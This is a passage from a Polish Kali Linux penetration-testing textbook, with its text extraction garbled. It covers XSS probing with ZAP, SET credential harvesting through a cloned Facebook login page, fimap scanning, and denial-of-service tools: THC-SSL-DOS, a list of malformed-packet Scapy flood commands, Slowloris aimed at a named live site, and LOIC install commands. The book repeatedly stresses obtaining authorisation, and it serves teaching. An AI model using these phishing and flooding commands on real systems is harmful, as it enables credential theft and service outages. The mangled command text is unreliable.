W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
